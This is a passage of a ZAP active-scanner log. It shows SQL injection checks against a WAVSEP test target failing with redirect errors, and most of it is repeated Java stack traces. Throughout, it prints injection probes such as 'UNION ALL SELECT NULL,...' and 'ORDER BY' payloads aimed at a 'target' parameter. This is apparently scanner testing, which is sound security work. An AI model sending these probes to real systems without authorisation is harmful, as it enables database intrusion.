Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680892 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680892 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680893 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680894 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680894 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680896 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680896 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680897 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680898 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680899 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680900 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680900 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 8652#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8652# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680901 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 